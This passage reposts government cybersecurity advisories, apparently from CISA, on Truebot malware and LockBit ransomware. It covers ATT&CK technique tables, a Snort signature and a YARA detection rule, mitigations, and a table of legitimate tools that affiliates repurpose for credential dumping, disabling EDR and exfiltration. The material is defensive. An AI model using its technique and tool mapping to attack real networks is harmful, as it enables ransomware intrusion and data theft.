Masquerading: Masquerade File Type	T1036.008	Cyber threat actors hide Truebot malware as legitimate appearing file formats.
Process Injection	T1055	Truebot malware has the ability to load shell code after establishing a C2 connection.
Indicator Removal: File Deletion	T1070.004	Truebot malware implements self-deletion TTPs throughout its attack cycle to evade detection. Teleport exfiltration tool deletes itself after it has completed exfiltrating data to the C2 station.
Modify Registry	T1112	FlawedGrace is able to modify registry programs that control the order that documents are loaded to a print que.
Reflective Code Loading	T1620	Truebot malware has the capability to load shell code and deploy various tools to stealthily navigate an infected network.

Table 11: Credential Access
Technique Title	ID	Use
OS Credential Dumping: LSASS Memory	T1003.001	Cyber threat actors use cobalt strike to gain valid credentials through LSASS memory dumping.

Table 12: Discovery
Technique Title	ID	Use
System Network Configuration Discovery	T1016	Truebot malware scans and enumerates the affected system’s domain names.
Process Discovery	T1057	Truebot malware enumerates all running processes on the local host.
System Information Discovery	T1082	Truebot malware scans and enumerates the OS version information, and processor architecture. Truebot malware enumerates the affected system’s computer names.
System Time Discovery	T1124	Truebot has the ability to discover system time metrics, which aids in enables synchronization with the compromised system’s internal clock to facilitate scheduling tasks.
Software Discovery: Security Software Discovery	T1518.001	Truebot has the ability to discover software security protocols, which aids in defense evasion.
Debugger Evasion	T1622	Truebot malware scans the compromised environment for debugger tools and enumerates them in effort to evade network defenses.

Table 13: Lateral Movement
Technique Title	ID	Use
Exploitation of Remote Services	T1210	Cyber threat actors exploit CVE-2022-31199 Netwrix Auditor vulnerability and use its capabilities to move laterally within a compromised network.
Use Alternate Authentication Material: Pass the Hash	T1550.002	Cyber threat actors use cobalt strike to authenticate valid accounts
Remote Service Session Hijacking	T1563.001	Cyber threat actors use cobalt strike to hijack remote sessions using SSH and RDP hijacking methods.
Remote Service Session Hijacking: RDP Hijacking	T1563.002	Cyber threat actors use cobalt strike to hijack remote sessions using SSH and RDP hijacking methods.
Lateral Tool Transfer	T1570	Cyber threat actors deploy additional payloads to transfer toolsets and move laterally.

Table 14: Collection

Technique Title

Use

Data from Local System

T1005

Truebot malware checks the current version of the OS and the processor architecture and compiles the information it receives.

Truebot gathers and compiles compromised system’s host and domain names.

Screen Capture

T1113

Truebot malware takes snapshots of local host data, specifically processor architecture data, and sends that to a phase 2 encoded data string.

Table 15: Command and Control
Technique Title	ID	Use
Application Layer Protocol	T1071	Cyber threat actors use teleport exfiltration tool to blend exfiltrated data with network traffic.
Non-Application Protocol	T1095	Cyber threat actors use Teleport and FlawedGrace to send data over custom communication protocol.
Ingress Transfer Tool	T1105	Cyber threat actors deploy various ingress transfer tool payloads to move laterally and establish C2 connections.
Encrypted Channel: Asymmetric Cryptography	T1573.002	Cyber threat actors use Teleport to create an encrypted channel using AES.

Table 16: Exfiltration
Technique Title	ID	Use
Scheduled Transfer	T1029	Teleport limits the data it collects and syncs with outbound organizational data/network traffic.
Data Transfer Size Limits	T1030	Teleport limits the data it collects and syncs with outbound organizational data/network traffic.
Exfiltration Over C2 Channel	T1048	Cyber threat actors blend exfiltrated data with network traffic to evade detection. Cyber threat actors use the Teleport tool to exfiltrate data over a C2 protocol.

DETECTION METHODS

CISA and authoring organizations recommend that organizations review and implement the following detection signatures, along with: Win/malicious_confidence100% (W), Trojan:Win32/Tnega!MSR, and Trojan.Agent.Truebot.Gen, as well as YARA rules below to help detect Truebot malware.

Detection Signatures

*Figure 2: Snort Signature to Detect Truebot Malware*
`alert tcp any any -> any any (msg:”TRUEBOT: Client HTTP Header”; sid:x; rev:1; flow:established,to_server; content:”Mozilla/112.0 (compatible\|3b 20 4d 53 49 45 20 31 31 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 30 29\|”; http_header; nocase; classtype:http-header; metadata:service http;)`

YARA Rules

CISA developed the following YARA to aid in detecting the presence of Truebot Malware.

*Figure 3: YARA Rule for Detecting Truebot Malware*
`rule CISA_10445155_01 : TRUEBOT downloader` `{` `meta:` `Author = "CISA Code & Media Analysis"` `Incident = "10445155"` `Date = "2023-05-17"` `Last_Modified = "20230523_1500"` `Actor = "n/a"` `Family = "TRUEBOT"` `Capabilities = "n/a"` `Malware_Type = "downloader"` `Tool_Type = "n/a"` `Description = "Detects TRUEBOT downloader samples"` `SHA256 = "7d75244449fb5c25d8f196a43a6eb9e453652b2185392376e7d44c21bd8431e7"` `strings:` `$s1 = { 64 72 65 6d 6d 66 79 74 74 72 72 65 64 2e 63 6f 6d }` `$s2 = { 4e 73 75 32 4f 64 69 77 6f 64 4f 73 32 }` `$s3 = { 59 69 50 75 6d 79 62 6f 73 61 57 69 57 65 78 79 }` `$s4 = { 72 65 70 6f 74 73 5f 65 72 72 6f 72 2e 74 78 74 }` `$s5 = { 4c 6b 6a 64 73 6c 66 6a 33 32 6f 69 6a 72 66 65 77 67 77 2e 6d 70 34 }` `$s6 = { 54 00 72 00 69 00 67 00 67 00 65 00 72 00 31 00 32 }` `$s7 = { 54 00 55 00 72 00 66 00 57 00 65 00 73 00 54 00 69 00 66 00 73 00 66 }` `condition:` `5 of them` `}`

Additional YARA rules for detecting Truebot malware can be referenced from GitHub.[9]

INCIDENT RESPONSE

The following steps are recommended if organizations detect a Truebot malware infection and compromise:

Quarantine or take offline potentially affected hosts.
Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
Provision new account credentials.
Reimage compromised host.
Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870) or contact your local FBI field office. State, local, tribal, or territorial government entities can also report to MS-ISAC (SOC@cisecurity.org or 866-787-4722).

MITIGATIONS

CISA and the authoring organizations recommend organizations implement the below mitigations, including mandating phishing-resistant multifactor authentication (MFA) for all staff and services.

For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs. Because the CPGs are a subset of best practices, CISA and co-sealers recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).

Apply patches to CVE-2022-31199
Update Netwrix Auditor to version 10.5

Reduce threat of malicious actors using remote access tools by:

Implementing application controls to manage and control execution of software, including allowlisting remote access programs.
- Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.

See the National Security Agency’s Cybersecurity Information sheet, Enforce Signed Software Execution Policies, and additional guidance below:

Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
- Audit the network for systems using RDP.
- Close unused RDP ports.
- Enforce account lockouts after a specified number of attempts.
- Apply phishing-resistant multifactor authentication (MFA).
- Log RDP login attempts.
Disable command-line and scripting activities and permissions [CPG 2.N].
Restrict the use of PowerShell by using Group Policy, and only grant to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems (OSs) should be permitted to use PowerShell [CPG 2.E].
Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].
Enable enhanced PowerShell logging [CPG 2.T, 2.U].
- PowerShell logs contain valuable data, including historical OS and registry interaction and possible IOCs of a cyber threat actor’s PowerShell use.
- Ensure PowerShell instances, using the latest version, have module, script block, and transcription logging enabled (enhanced logging).
- The two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell Operational Log. The authoring organizations recommend turning on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.
Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 4.C].
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E].
Reduce the threat of credential compromise via the following:
- Place domain admin accounts in the protected users’ group to prevent caching of password hashes locally.
- Implement Credential Guard for Windows 10 and Server 2016 (Refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).
- Refrain from storing plaintext credentials in scripts.
Implement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E]. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory (AD) level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.

In addition, CISA, FBI, MS-ISAC, and CCCS recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:

Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).
Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization minimizes the impact of disruption to business practices as they can retrieve their data [CPG 2.R].
Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute for Standards and Technology (NIST) standards for developing and managing password policies.
- Use longer passwords consisting of at least 15 characters [CPG 2.B].
- Store passwords in hashed format using industry-recognized password managers.
- Add password user “salts” to shared login credentials.
- Avoid reusing passwords [CPG 2.C].
- Implement multiple failed login attempt account lockouts [CPG 2.G].
- Disable password “hints.”
- Refrain from requiring password changes more frequently than once per year.
  Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
- Require administrator credentials to install software.
Require phishing-resistant multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H].
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to various subnetworks, restricting further lateral movement [CPG 2.F].
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections, as they have insight into common and uncommon network connections for each host [CPG 3.A].
Install, regularly update, and enable real time detection for antivirus software on all hosts.
Disable unused ports [CPG 2.V].
Consider adding an email banner to emails received from outside your organization [CPG 2.M].
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

VALIDATE SECURITY CONTROLS

To get started:

Select an ATT&CK technique described in this advisory (see Tables 5-13).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

ACKNOWLEDGEMENTS

VMware’s Carbon Black contributed to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, and co-sealers.

Source de l’article sur us-cert.gov

5 July 2023/by Service comm.

Understanding Ransomware Threat Actors: LockBit

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

SUMMARY

In 2022, LockBit was the most deployed ransomware variant across the world and continues to be prolific in 2023. Since January 2020, affiliates using LockBit have attacked organizations of varying sizes across an array of critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. LockBit ransomware operation functions as a Ransomware-as-a-Service (RaaS) model where affiliates are recruited to conduct ransomware attacks using LockBit ransomware tools and infrastructure. Due to the large number of unconnected affiliates in the operation, LockBit ransomware attacks vary significantly in observed tactics, techniques, and procedures (TTPs). This variance in observed ransomware TTPs presents a notable challenge for organizations working to maintain network security and protect against a ransomware threat.

The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the following international partners, hereafter referred to as “authoring organizations,” are releasing this Cybersecurity Advisory (CSA) detailing observed activity in LockBit ransomware incidents and providing recommended mitigations to enable network defenders to proactively improve their organization’s defenses against this ransomware operation.

Australian Cyber Security Centre (ACSC)
Canadian Centre for Cyber Security (CCCS)
United Kingdom’s National Cyber Security Centre (NCSC-UK)
National Cybersecurity Agency of France (ANSSI)
Germany’s Federal Office for Information Security (BSI)
New Zealand’s Computer Emergency Response Team (CERT NZ) and National Cyber Security Centre (NCSC NZ)

The authoring organizations encourage the implementation of the recommendations found in this CSA to reduce the likelihood and impact of future ransomware incidents.

Understanding Ransomware Threat Actors: LockBit (PDF, 1.24 MB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13.1. See the MITRE ATT&CK Tactics and Techniques section for tables of LockBit’s activity mapped to MITRE ATT&CK® tactics and techniques.

Introduction

The LockBit RaaS and its affiliates have negatively impacted organizations, both large and small, across the world. In 2022, LockBit was the most active global ransomware group and RaaS provider in terms of the number of victims claimed on their data leak site. [1] A RaaS cybercrime group maintains the functionality of a particular ransomware variant, sells access to that ransomware variant to individuals or groups of operators (often referred to as “affiliates”), and supports affiliates’ deployment of their ransomware in exchange for upfront payment, subscription fees, a cut of profits, or a combination of upfront payment, subscription fees, and a cut of profits. Some of the methods LockBit has used to successfully attract affiliates include, but are not limited to:

Assuring payment by allowing affiliates to receive ransom payments before sending a cut to the core group; this practice stands in stark contrast to other RaaS groups who pay themselves first and then disburse the affiliates’ cut.
Disparaging other RaaS groups in online forums.
Engaging in publicity-generating activities stunts, such as paying people to get LockBit tattoos and putting a $1 million bounty on information related to the real-world identity of LockBit’s lead who goes by the persona “LockBitSupp.”
Developing and maintaining a simplified, point-and-click interface for its ransomware, making it accessible to those with a lower degree of technical skill. [2, 3]

LockBit has been successful through innovation and ongoing development of the group’s administrative panel and the RaaS supporting functions. In parallel, affiliates that work with LockBit and other notable variants are constantly revising the TTPs used for deploying and executing ransomware.

Table 1 shows LockBit RaaS’s innovation and development.

Table 1: Evolution of LockBit RaaS

Date	Event
September 2019	First observed activity of ABCD ransomware, the predecessor to LockBit. [4]
January 2020	LockBit-named ransomware first seen on Russian-language based cybercrime forums.
June 2021	Appearance of LockBit version 2 (LockBit 2.0), also known as LockBit Red including StealBit, a built-in information-stealing tool.
October 2021	Introduction of LockBit Linux-ESXi Locker version 1.0 expanding capabilities to target systems to Linux and VMware ESXi. [5]
March 2022	Emergence of LockBit 3.0, also known as LockBit Black, that shares similarities with BlackMatter and Alphv (also known as BlackCat) ransomware.
September 2022	Non-LockBit affiliates able to use LockBit 3.0 after its builder was leaked. [2, 6]
January 2023	Arrival of LockBit Green incorporating source code from Conti ransomware. [7]
April 2023	LockBit ransomware encryptors targeting macOS seen on VirusTotal [8, 9]

LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker are still available for affiliates’ use on LockBit’s panel.

LockBit Statistics

Percentage of ransomware incidents attributed to LockBit:

Australia: From April 1, 2022, to March 31, 2023, LockBit made up 18% of total reported Australian ransomware incidents. This figure includes all variants of LockBit ransomware, not solely LockBit 3.0.
Canada: In 2022, LockBit was responsible for 22% of attributed ransomware incidents in Canada.[10]
New Zealand: In 2022, CERT NZ received 15 reports of LockBit ransomware, representing 23% of 2022 ransomware reports.
United States: In 2022, 16% of the State, Local, Tribal, and Tribunal (SLTT) government ransomware incidents reported to the MS-ISAC were identified as LockBit attacks. This included ransomware incidents impacting municipal governments, county governments, public higher education and K-12 schools, and emergency services (e.g., law enforcement).

Number of LockBit ransomware attacks in the U.S. since 2020:

About 1,700 attacks according to the FBI.

Total of U.S. ransoms paid to LockBit:

Approximately $91M since LockBit activity was first observed in the U.S. on January 5, 2020.

Earliest observed LockBit activity:

Australia: The earliest documented occurrence of LockBit 3.0 was in early August 2022.
Canada: The first recorded instance of LockBit activity in Canada was in March 2020.
New Zealand: The first recorded incident involving LockBit ransomware was in March 2021.
United States: LockBit activity was first observed on January 5, 2020.

Most recently observed LockBit activity:

Australia: April 21, 2023.
New Zealand: February 2023.
United States: As recently as May 25, 2023.

Operational activity related to LockBit in France

Since the first case in July 2020 to present, ANSSI has handled 80 alerts linked to the LockBit ransomware, which accounts for 11% of all ransomware cases handled by ANSSI in that period. In about 13% of those cases, ANSSI was not able to confirm nor deny the breach of its constituents’ networks – as the alerts were related to the threat actor’s online claims. So far, 69 confirmed incidents have been handled by ANSSI. Table 2 shows the LockBit activity observed by ANSSI versus overall ransomware activity tracked by the Computer Emergency Response Team-France (CERT-FR).

Table 2: ANSSI-Observed LockBit vs. Overall Ransomware Activity

Year	Number of Incidents	Percentage of CERT-FR’s Ransomware-Related Activity
2020 (from July)	4	2%
2021	20	10%
2022	30	27%
2023	15	27%
Total (2020-2023)	69	11%

Table 3 shows the number of instances different LockBit strains were observed by ANSSI from July 2020 to present.

Table 3: ANSSI-Observed LockBit Strain and Number of Instances

Name of the Strain*	Number of Instances
LockBit 2.0 (LockBit Red)	26
LockBit 3.0 (LockBit Black)	23
LockBit	21
LockBit Green	1
LockBit (pre-encryption)	1
Total	72**

* Name either obtained from ANSSI’s or the victim’s investigations
** Includes incidents with multiple strains

Figure 1: ANSSI-Observed LockBit Strains by Year

From the incidents handled, ANSSI can infer that LockBit 3.0 widely took over from LockBit 2.0 and the original LockBit strain from 2022. In two cases, victims were infected with as many as three different strains of LockBit (LockBit 2.0/Red, LockBit 3.0/Black, and LockBit Green).

Leak Sites

The authoring agencies observe data leak sites, where attackers publish the names and captured data of victims if they do not pay ransom or hush money. Additionally, these sites can be used to record alleged victims who have been threatened with a data leak. The term ‘victims’ may include those who have been attacked, or those who have been threatened or blackmailed (with the attack having taken place).

The leak sites only show the portion of LockBit affiliates’ victims subjected to secondary extortion. Since 2021, LockBit affiliates have employed double extortion by first encrypting victim data and then exfiltrating that data while threatening to post that stolen data on leak sites. Because LockBit only reveals the names and leaked data of victims who refuse to pay the primary ransom to decrypt their data, some LockBit victims may never be named or have their exfiltrated data posted on leak sites. As a result, the leak sites reveal a portion of LockBit affiliates’ total victims. For these reasons, the leak sites are not a reliable indicator of when LockBit ransomware attacks occurred. The date of data publication on the leak sites may be months after LockBit affiliates actually executed ransomware attacks.

Up to the Q1 2023, a total of 1,653 alleged victims were observed on LockBit leak sites. With the introduction of LockBit 2.0 and LockBit 3.0, the leak sites have changed, with some sources choosing to differentiate leak sites by LockBit versions and others ignoring any differentiation. Over time, and through different evolutions of LockBit, the address and layout of LockBit leak sites have changed and are aggregated under the common denominator of the LockBit name. The introduction of LockBit 2.0 at the end of the Q2 2021 had an immediate impact on the cybercriminal market due to multiple RaaS operations shutting down in May and June 2021 (e.g., DarkSide and Avaddon). LockBit competed with other RaaS operations, like Hive RaaS, to fill the gap in the cybercriminal market leading to an influx of LockBit affiliates. Figure 2 shows the alleged number of victims worldwide on LockBit leak sites starting in Q3 2020. Figure 2 shows the alleged number of victims worldwide on LockBit leak sites starting in Q3 2020.

Figure 2: Alleged Number of Victims Worldwide on LockBit Leak Sites

Tools

During their intrusions, LockBit affiliates have been observed using various freeware and open-source tools that are intended for legal use. When repurposed by LockBit, these tools are then used for a range of malicious cyber activity, such as network reconnaissance, remote access and tunneling, credential dumping, and file exfiltration. Use of PowerShell and batch scripts are observed across most intrusions, which focus on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of professional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed.

Table 4 shows a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware operations. The legitimate freeware and open-source tools mentioned in this product are all publicly available and legal. The use of these tools by a threat actor should not be attributed to the freeware and open-source tools, absent specific articulable facts tending to show they are used at the direction or under the control of a threat actor.

Table 4: Freeware and Open-Source Tools Used by LockBit Affiliates

Tool	Intended Use	Repurposed Use by LockBit Affiliates	MITRE ATT&CK ID
7-zip	Compresses files into an archive.	Compresses data to avoid detection before exfiltration.	T1562 Impair Defenses
AdFind	Searches Active Directory (AD) and gathers information.	Gathers AD information used to exploit a victim’s network, escalate privileges, and facilitate lateral movement.	S0552 AdFind
Advanced Internet Protocol (IP) Scanner	Performs network scans and shows network devices.	Maps a victim’s network to identify potential access vectors.	T1046 Network Service Discovery
Advanced Port Scanner	Performs network scans.	Finds open Transmission Control Protocol (TCP) and User Data Protocol (UDP) ports for exploitation.	T1046 Network Service Discovery
AdvancedRun	Allows software to be run with different settings.	Enables escalation of privileges by changing settings before running software.	TA0004 Privilege Escalation
AnyDesk	Enables remote connections to network devices.	Enables remote control of victim’s network devices.	T1219 Remote Access Software
Atera Remote Monitoring & Management (RMM)	Enables remote connections to network devices.	Enables remote control of victim’s network devices.	T1219 Remote Access Software
Backstab	Terminates antimalware-protected processes.	Terminates endpoint detection and response (EDR)- protected processes.	T1562.001 Impair Defenses: Disable or Modify Tools
Bat Armor	Generates .bat files using PowerShell scripts.	Bypasses PowerShell execution policy.	T1562.001 Impair Defenses: Disable or Modify Tools
Bloodhound	Performs reconnaissance of AD for attack path management.	Enables identification of AD relationships that can be exploited to gain access onto a victim’s network.	T1482 Domain Trust Discovery
Chocolatey	Handles command-line package management on Microsoft Windows.	Facilitates installation of LockBit affiliate actors’ tools.	T1072 Software Deployment Tools
Defender Control	Disables Microsoft Defender.	Enables LockBit affiliate actors to bypass Microsoft Defender.	T1562.001 Impair Defenses: Disable or Modify Tools
ExtPassword	Recovers passwords from Windows systems.	Obtains credentials for network access and exploitation.	T1003 Operating System (OS) Credential Dumping
FileZilla	Performs cross-platform File Transfer Protocol (FTP) to a site, server, or host.	Enables data exfiltration over FTP to the LockBit affiliate actors’ site, server, or host.	T1071.002 Application Layer Protocol: File Transfer Protocols
FreeFileSync	Facilitates cloud-based file synchronization.	Facilitates cloud-based file synchronization for data exfiltration.	T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
GMER	Removes rootkits.	Terminates and removes EDR software.	T1562.001 Impair Defenses: Disable or Modify Tools
Impacket	Collection of Python classes for working with network protocols.	Enables lateral movement on a victim’s network.	S0357 Impacket
LaZagne	Recovers system passwords across multiple platforms.	Collect credentials for accessing a victim’s systems and network.	S0349 LaZagne
Ligolo	Establishes SOCKS5 or TCP tunnels from a reverse connection for pen testing.	Enables connections to systems within the victim’s network via reverse tunneling.	T1095 Non-Application Layer Protocol
LostMyPassword	Recovers passwords from Windows systems.	Obtains credentials for network access and exploitation.	T1003 OS Credential Dumping
MEGA Ltd MegaSync	Facilitates cloud-based file synchronization.	Facilitates cloud-based file synchronization for data exfiltration.	T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Microsoft Sysinternals ProcDump	Monitors applications for central processing unit (CPU) spikes and generates crash dumps during a spike.	Obtains credentials by dumping the contents of Local Security Authority Subsystem Service (LSASS).	T1003.001 OS Credential Dumping: LSASS Memory
Microsoft Sysinternals PsExec	Executes a command-line process on a remote machine.	Enables LockBit affiliate actors to control victim’s systems.	S0029 PsExec
Mimikatz	Extracts credentials from a system.	Extracts credentials from a system for gaining network access and exploiting systems.	S0002 Mimikatz
Ngrok	Enables remote access to a local web server by tunnelling over the internet.	Enables victim network protections to be bypassed by tunnelling to a system over the internet.	S0508 Ngrok
PasswordFox	Recovers passwords from Firefox Browser.	Obtains credentials for network access and exploitation.	T1555.003 Credentials from Web Browsers
PCHunter	Enables advanced task management including system processes and kernels.	Terminates and circumvents EDR processes and services.	T1562.001 Impair Defenses: Disable or Modify Tools
PowerTool	Removes rootkits, as well as detecting, analyzing, and fixing kernel structure modifications.	Terminates and removes EDR software.	T1562.001 Impair Defenses: Disable or Modify Tools
Process Hacker	Removes rootkits.	Terminates and removes EDR software.	T1562.001 Impair Defenses: Disable or Modify Tools
PuTTY Link (Plink)	Automates Secure Shell (SSH) actions on Windows.	Enables LockBit affiliate actors to avoid detection.	T1572 Protocol Tunneling
Rclone	Manages cloud storage files using a command-line program.	Facilitates data exfiltration over cloud storage.	S1040 Rclone
Seatbelt	Performs numerous security-oriented checks.	Performs numerous security-oriented checks to enumerate system information.	T1082 System Information Discovery
ScreenConnect (also known as ConnectWise)	Enables remote connections to network devices for management.	Enables LockBit affiliate actors to remotely connect to a victim’s systems.	T1219 Remote Access Software
SoftPerfect Network Scanner	Performs network scans for systems management.	Enables LockBit affiliate actors to obtain information about a victim’s systems and network.	T1046 Network Service Discovery
Splashtop	Enables remote connections to network devices for management.	Enables LockBit affiliate actors to remotely connect to systems over Remote Desktop Protocol (RDP).	T1021.001 Remote Services: Remote Desktop Protocol
TDSSKiller	Removes rootkits.	Terminates and removes EDR software.	T1562.001 Impair Defenses: Disable or Modify Tools
TeamViewer	Enables remote connections to network devices for management.	Enables LockBit affiliate actors to remotely connect to a victim’s systems.	T1219 Remote Access Software
ThunderShell	Facilitates remote access via Hypertext Transfer Protocol (HTTP) requests.	Enables LockBit affiliate actors to remotely access systems while encrypting network traffic.	T1071.001 Application Layer Protocol: Web Protocols
WinSCP	Facilitates file transfer using SSH File Transfer Protocol for Microsoft Windows.	Enables data exfiltration via the SSH File Transfer Protocol.	T1048 Exfiltration Over Alternative Protocol

Common Vulnerabilities and Exposures (CVEs) Exploited

Based on secondary sources, it was noted that affiliates exploit older vulnerabilities like CVE-2021-22986, F5 iControl REST unauthenticated Remote Code Execution Vulnerability, as well as newer vulnerabilities such as:

CVE-2023-0669: Fortra GoAnyhwere Managed File Transfer (MFT) Remote Code Execution Vulnerability
CVE-2023-27350: PaperCut MF/NG Improper Access Control Vulnerability

LockBit affiliates have been documented exploiting numerous CVEs, including:

CVE-2021-44228: Apache Log4j2 Remote Code Execution Vulnerability,
CVE-2021-22986: F5 BIG-IP and BIG-IQ Centralized Management iControl REST Remote Code Execution Vulnerability,
CVE-2020-1472: NetLogon Privilege Escalation Vulnerability,
CVE-2019-0708: Microsoft Remote Desktop Services Remote Code Execution Vulnerability, and
CVE-2018-13379: Fortinet FortiOS Secure Sockets Layer (SSL) Virtual Private Network (VPN) Path Traversal Vulnerability.

For further information on these CVEs, see CISA’s Known Exploited Vulnerabilities (KEV) Catalog.

Post Detonation TTPs

When LockBit affiliates target an organization responsible for managing other organizations’ networks, CERT NZ has observed LockBit affiliates attempt secondary ransomware extortion after detonation of the LockBit variant on the primary target. Once the primary target is hit, LockBit affiliates then attempt to extort the companies that are customers of the primary target. This extortion is in the form of secondary ransomware that locks down services those customers consume. Additionally, the primary target’s customers may be extorted by LockBit affiliates threatening to release those customers’ sensitive information.

MITRE ATT&CK Tactics and Techniques

Tables 5-16 show the LockBit affiliate tactics and techniques referenced in this advisory.

Table 5: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Initial Access

Technique Title	ID	Use
Drive-by Compromise	T1189	LockBit affiliates gain access to a system through a user visiting a website over the normal course of browsing.
Exploit Public-Facing Application	T1190	LockBit affiliates may exploit vulnerabilities (e.g., Log4Shell) in internet-facing systems to gain access to victims’ systems.
External Remote Services	T1133	LockBit affiliates exploit RDP to gain access to victims’ networks.
Phishing	T1566	LockBit affiliates use phishing and spearphishing to gain access to victims’ networks.
Valid Accounts	T1078	LockBit affiliates obtain and abuse credentials of existing accounts as a means of gaining initial access.

Table 6: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Execution

Technique Title	ID	Use
Execution	TA0002	LockBit 3.0 launches commands during its execution.
Command and Scripting Interpreter: Windows Command Shell	T1059.003	LockBit affiliates use batch scripts to execute malicious commands.
Software Deployment Tools	T1072	LockBit affiliates may use Chocolatey, a command-line package manager for Windows.

Technique Title	ID	Use
System Services: Service Execution	T1569.002	LockBit 3.0 uses PsExec to execute commands or payloads.

Table 7: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Persistence

Technique Title	ID	Use
Boot or Logon Autostart Execution	T1547	LockBit affiliates enables automatic logon for persistence.
Valid Accounts	T1078	LockBit affiliates may use a compromised user account to maintain persistence on the target network.

Table 8: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Privilege Escalation

Technique Title	ID	Use
Privilege Escalation	TA0004	LockBit affiliates will attempt to escalate to the required privileges if current account privileges are insufficient.
Abuse Elevation Control Mechanism	T1548	LockBit affiliates may use ucmDccwCOM Method in UACMe, a GitHub collection of User Account Control (UAC) bypass techniques.
Boot or Logon Autostart Execution	T1547	LockBit affiliates enable automatic logon for privilege escalation.
Domain Policy Modification: Group Policy Modification	T1484.001	LockBit affiliates may create Group Policy for lateral movement and can force group policy updates.
Valid Accounts	T1078	LockBit affiliates may use a compromised user account to escalate privileges on a victim’s network.

Table 9: LockBit Affiliates’ ATT&CK Techniques for Enterprise – Defense Evasion

Technique Title	ID	Use
Execution Guardrails: Environmental Keying	T1480.001	LockBit 3.0 will only decrypt the main component or continue to decrypt and/or decompress data if the correct password is entered.
